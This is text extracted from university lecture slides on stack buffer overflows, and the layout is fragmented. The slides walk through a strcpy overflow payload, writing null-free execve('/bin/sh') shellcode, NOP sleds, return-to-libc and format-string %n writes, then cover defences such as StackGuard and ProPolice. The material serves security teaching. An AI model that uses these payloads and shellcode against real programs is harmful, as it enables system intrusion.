Buffer
Buffer
1. Stack-based
– covered in this class
2. Heap-based
– more advanced
– very dependent on system and library version
1
Basic Example
#include <string.h>
int main(int argc, char **argv) { …
char buf[64];
argv
strcpy(buf, argv[1]);
} argc
return addr
Dump of assembler code for function main: caller’s ebp
0x080483e4 <+0>: push %ebp %ebp
buf
0x080483e5 <+1>: mov %esp,%ebp
(64 bytes)
0x080483e7 <+3>: sub $72,%esp
0x080483ea <+6>: mov 12(%ebp),%eax
0x080483ed <+9>: mov 4(%eax),%eax
0x080483f0 <+12>: mov %eax,4(%esp)
0x080483f4 <+16>: lea -64(%ebp),%eax
0x080483f7 <+19>: mov %eax,(%esp)
0x080483fa <+22>: call 0x8048300 <strcpy@plt> argv[1]
0x080483ff <+27>: leave
buf
0x08048400 <+28>: ret %esp
2
2
“123456”
#include <string.h>
int main(int argc, char **argv) { …
char buf[64];
argv
strcpy(buf, argv[1]);
} argc
return addr
Dump of assembler code for function main: caller’s ebp
0x080483e4 <+0>: push %ebp %ebp
buf
0x080483e5 <+1>: mov %esp,%ebp
(64 bytes)
0x080483e7 <+3>: sub $72,%esp
0x080483ea <+6>: mov 12(%ebp),%eax
0x080483ed <+9>: mov 4(%eax),%eax
123456\0
0x080483f0 <+12>: mov %eax,4(%esp)
0x080483f4 <+16>: lea -64(%ebp),%eax
0x080483f7 <+19>: mov %eax,(%esp)
0x080483fa <+22>: call 0x8048300 <strcpy@plt> argv[1]
0x080483ff <+27>: leave
buf
0x08048400 <+28>: ret %esp
3
3
“A”x68 . “\xEF\xBE\xAD\xDE”
#include <string.h>
int main(int argc, char **argv) { …
char buf[64];
argv
strcpy(buf, argv[1]);
} corrupted argc
overwritten 0xDEADBEEF
return addr
Dump of assembler code for function main: overwritten caller’s
AAAAebp
0x080483e4 <+0>: push %ebp %ebp
buf
0x080483e5 <+1>: mov %esp,%ebp
(64 bytes)
shellcode…
…
0x080483fa <+22>: call 0x8048300 <strcpy@plt> argv[1]
0x080483ff <+27>: leave
buf
0x08048400 <+28>: ret %esp
8
Executing system calls
execve(“/bin/sh”, 0, 0);
1. Put syscall number in eax
2. Set up arg 1 in ebx, arg 2 in ecx, arg
3 in edx execve is
0xb
3. Call int 0x80*
4. System call runs. Result in eax
addr. in ebx,
0 in ecx
Shellcode
10
Author: kernel_panik, [Link]
Program Example
#include <stdio.h>
#include <string.h>
11
Author: kernel_panik, [Link]
Execution
xor ecx, ecx 0x0 0x0
mul ecx 0x68 h
push ecx 0x73 s
push 0x68732f2f 0x2f /
push 0x6e69622f ebx esp
0x2f /
mov ebx, esp ecx 0
0x6e n
mov al, 0xb eax 0x0b
0x69 i
int 0x80 Registers
0x62 b
esp 0x2f /
Shellcode
12
Author: kernel_panik, [Link]
Tips
Factors affecting the stack frame: …
• statically declared buffers may be padded argv
• what about space for callee-save regs? argc
• [advanced] what if some vars are in regs only? return addr
• [advanced] what if compiler reorder caller’s ebp
%ebp
local variables on stack? buf
0x90
...
nop slide 0x90
Protip: Inserting nop’s (e.g., argv[1]
0x90) into shellcode allow buf
for slack
14
Recap
To generate exploit for a basic buffer overflow:
computation + control
15
Stack Buffers
slide 16
What If Buffer is Overstuffed?
• Memory pointed to by str is copied onto stack…
void func(char *str) {
char buf[126]; strcpy does NOT check whether the string
strcpy(buf,str); at *str contains fewer than 126 characters
}
• If a string longer than 126 bytes is copied into buffer, it will overwrite
adjacent stack locations
This will be
interpreted
as return address!
slide 17
Executing Attack Code
• Suppose buffer contains attacker-created string
– For example, *str contains a string received from the
network as input to some network service daemon
slide 19
Attack #1: Return Address
② set stack pointers to
return to a dangerous
library function
Attack code “/bin/sh”
args (funcp)
① system()
return address
① Change the return address to point
PFP
to the attack code. After the
function returns, control is pointer var (ptr)
transferred to the attack code buffer (buf)
② … or return-to-libc: use existing
instructions in the code segment
such as system(), exec(), etc. as
the attack code
slide 20
Buffer Overflow Issues
• Executable attack code is stored on stack, inside
the buffer containing attacker’s string
– Stack memory is supposed to contain only data, but…
• For the basic attack, overflow portion of the buffer
must contain correct address of attack code in the
RET position
– The value in the RET position must point to the
beginning of attack assembly code in the buffer
• Otherwise application will crash with segmentation violation
– Attacker must correctly guess in which stack position
his buffer will be when the function is called
slide 21
Problem: No Range Checking
• strcpy does not check input size
– strcpy(buf, str) simply copies memory contents into
buf starting from *str until “\0” is encountered,
ignoring the size of area allocated to buf
• Many C library functions are unsafe
– strcpy(char *dest, const char *src)
– strcat(char *dest, const char *src)
– gets(char *s)
– scanf(const char *format, …)
– printf(const char *format, …)
slide 22
Does Range Checking Help?
• strncpy(char *dest, const char *src, size_t n)
– If strncpy is used instead of strcpy, no more than n
characters will be copied from *src to *dest
• Programmer has to supply the right value of n
• Potential overflow in htpasswd.c (Apache 1.3):
Copies username (“user”) into buffer (“record”),
… strcpy(record,user); then appends “:” and hashed password (“cpw”)
strcat(record,”:”);
strcat(record,cpw); …
slide 24
Attack #2: Pointer Variables
return address
PFP
slide 27
Two’s Complement
Binary representation of negative integers
Represent X (where X<0) as 2N-|X|
N is word size (e.g., 32 bits on x86 architecture)
1 0 0 0 0
…
0 1
231-1 0 1 1 1
…
1 1
-1 1 1 1 1
…
1 1
231 ??
-2 1 1 1 1
…
1 0
-231 1 0 0 0
…
0 0
slide 28
Integer Overflow
slide 29
Heap Overflow
slide 31
Implementation of Variable Args
• Special functions va_start, va_arg, va_end
compute arguments at run-time (how?)
slide 32
Activation Record for Variable Args
slide 33
Format Strings in C
• Proper use of printf format string:
… int foo=1234;
printf(“foo = %d in decimal, %X in hex”,foo,foo); …
• This will print
foo = 1234 in decimal, 4D2 in hex
C has a concise way of printing multiple symbols: %Mx will print exactly M bytes (taking them from the
stack). If attackString contains enough “%Mx” so that its total length is equal to the most significant
byte of the address of the attack code, this byte will be written into &RET.
Repeat three times (four “%n” in total) to write into &RET+1, &RET+2, &RET+3, replacing RET with the
address of attack code.
detect_attack() prevents
checksum attack on SSH1…
slide 38
Background-layout of the Virtual Space of a Process
The
layout of
the
virtual
space of
a
process
in Linux
Cont.
• Code and data consist of instructions and initialized ,
uninitialized global and static data respectively;
• Runtime heap is used for dynamically allocated
memory(malloc());
• The stack is used whenever a function call is made.
Layout Of Stack
Low
address
String Inject malicious code
Local variable (buffer) into the virtual space of
grows
Stack
a process;
grows
Modify the content of
RET to redirect the
RET execution flow to the
malicious code.
Attack Code
The goal is to exploit a buffer overflow so that the execution flow can be re-
directed to 0x00401034.
Cont.
• Find that 401034 is^@“P4”inASCII\'(0' is 00)
int main()
{
sh();
printf("main end :)\n");
return;
}
Cont.
(gdb) disas sh
Dump of assembler code for function sh:
0x08048208 <sh+0>: push %ebp return
0x08048209 <sh+1>: mov %esp,%ebp
0x0804820b <sh+3>: sub $0x10,%esp
0x0804820e <sh+6>: lea -0x4(%ebp),%eax Previous ebp
0x08048211 <sh+9>: add $0x8,%eax
0x08048214 <sh+12>: mov %eax,-
RET
0x4(%ebp)
0x08048217 <sh+15>: mov -
0x4(%ebp),%edx
0x0804821a <sh+18>: mov
$0x80bd6a0,%eax
0x0804821f <sh+23>: mov
%eax,(%edx)
0x08048221 <sh+25>: leave
0x08048222 <sh+26>: ret
Three issues for injecting codes
• How to find a location in the stack to inject malicious code?
• How to generate a shellcode (Attack Code)?
• How to redirect the execution flow to the shellcode?
– If using stack buffer overflow, the content of memory unit
storing return address should be modified.
– The injected payload should be long enough to do
overwriting.
How to find a location to inject code
• If using stack buffer overflow, we might need to locate the stack of a
function.
• Then we need to determine the offset from the bottom or the top
of stack to inject the shell code
• We can use the following code to locate a stack:
int main()
{
printf("0x%x\n",find_start());
printf("0x%x\n",find_end());
}
Shell code
• Shellcode is defined as a set of instructions which is injected and
then is executed by an exploited program;
• Shellcode is used to directly manipulate registers and the function
of a program;
• Most of shellcodes use system call to do malicious behaviors;
• System calls is a set of functions which allow you to access
operating system-specific functions such as getting input, producing
output, exiting a process;
How to execute a system call in Linux?
Example:
main()
{
exit(0);
}
Cont.
gcc -g -static -o exit exit.c
gdb exit
Arlington:/home/src/shellcodes/code/ch03# gdb exit
GNU gdb 6.7.1-debian
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <[Link]
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/i686/cmov/libthread_db.so.1".
(gdb) disas _exit
Dump of assembler code for function _exit:
0x0804df4c <_exit+0>: mov 0x4(%esp),%ebx
0x0804df50 <_exit+4>: mov $0xfc,%eax
0x0804df55 <_exit+9>: int $0x80
0x0804df57 <_exit+11>:mov $0x1,%eax
0x0804df5c <_exit+16>: int $0x80
0x0804df5e <_exit+18>: hlt
End of assembler dump.
Write a shell code for exit()
• The shell code should do the following:
– Store the value of 0 into EBX;
– Store the value of 1 into EAX;
– Execute int 0x80 instruction
Cont.
Section .text
global _start
_start:
mov ebx, 0
mov eax, 1
int 0x80
Cont.
Arlington:/home/src/shellcodes/# nasm -f elf [Link]
Arlington:/home/src/shellcodes/# ld -o exit_1 exit.o
Arlington:/home/src/shellcodes/# objdump -d exit_1
08048060 <_start>:
8048060: bb 00 00 00 00 mov $0x0,%ebx
8048065: b8 01 00 00 00 mov $0x1,%eax
804806a: cd 80 int $0x80
Red words can be used as the shell code.
Cont.
char shellcode[] = "\xbb\x00\x00\x00\x00"
"\xb8\x01\x00\x00\x00"
"\xcd\x80";
int main()
{
int *return;
return = (int *)&return + 2;
(*return) = (int)shellcode;
}
Injectable Shellcode
• Null (\x00) will cause shellcode to fail when injected into a
character array because \x00 is used to terminate strings;
• Injectable shellcode can't contain \x00;
• shellcode[] = "\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80" is not an
injectable shellcode;
• How to remove \x00?
• Use “xor ebx, ebx” to replace “mov ebx, 0”
• Use “mov al, 1 ” to replace “mov eax, 1”
Cont.
bb 00 00 00 00 mov $0x0,%ebx
b8 01 00 00 00 mov $0x1,%eax
cd 80 int $0x80
shellcode[]=”\x31\xdb\xb0\x01\xcd\x80”
A framework for injectable shellcode
shellcode:
pop esi // esi will contain the address of '/bin/sh'
<shellcode meat>
GotoCall:
Call shellcode // GetPC code
Db '/bin/sh'
GetPC Code
• Call
• fsave/fstenv
• Can be used to get the address of last FPU instruction
– fldz
– fnstenv [esp-12]
– pop ecx
– add cl, 10
– nop
– ECX will hold the address of the EIP.
An Example
section .text
global _start
_start:
jmp short GotoCall
shellcode:
pop esi
xor eax, eax
mov byte [esi + 7], al
lea ebx, [esi]
mov long [esi + 8], ebx
mov long [esi + 12], eax
mov byte al, 0x0b
mov ebx, esi
lea ecx, [esi + 8]
lea edx, [esi + 12]
int 0x80
GotoCall:
Call shellcode // GetPC Code
db '/bin/shJAAAAKKKK' // AAAA and KKKK can be parameters
for system calls
NOP Sled
• Determining the correct offset for injecting code is not easy;
• NOP (non operation) sled can be used to increase the number of
potential offsets;
• Generally, we can fill in the beginning of shellcode with NOPs.
• The opcode for NOP is 0x90
• EX: shellcode*+=”\x90\x90\x90\x31\xdb\xb0\x01\xcd\x80”
• Some FPU, SSE, MMX instructions can also be used as sled .
Summary of Launching An Attack
• Find a buffer overflow that can be used to
redirect the control flow of the victim program
– Stack Buffer Overflow
– Heap Buffer Overflow
• Inject a segment of malicious shellcode
How to prevent stack buffer overflow?
• Stack Guard
– In a stack , a canary word is placed after return address
whenever a function is called;
– The canary will be checked before the function returns. If value
of canary is changed , then it indicates an malicious behavior.
Variables
Old Base Pointer
Canary Value
Return
Address
Arguments
Higher address
6. Unix Stack
Frame
Cont.
• Canary can still be intact if the attacker overwrites it with the
correct value
– Solution – use “random canary” value
– Use “terminator canary” – consists of all string terminator sequences – NULL,
‘\r’, ‘\n’, -1…
• Attacker can still point to the ‘return address’ and change it,
without worrying about the canary
– This is a short-coming of StackGuard
– Can be dealt by XORing the canary value and ‘return address’ to detect if
‘return address’ has changed
Stack Shield.
• Stack Shield
– Copy RET address into an unoverflowable memory region;
– The values of two RET addresses will be compared before a
function returns;
– If the values are different, then an malicious exploitation occurs;
– Needs another stack-like data structure to maintain RET
addresses.
ProPolice
• Perhaps most sophisticated
compiler protection
• Rearrange local variables such
Local Variables
that char buffers always are
and Pointers
allocated at bottom addresses ( Lower address
top of the stack), and are
guarded by a Guard Value Local char buffers
• Does not work fine with small
Guard Value
buffers – somewhat unstable
Old Base Pointer
Return Address
Arguments
Higher address
7. Unix Stack Frame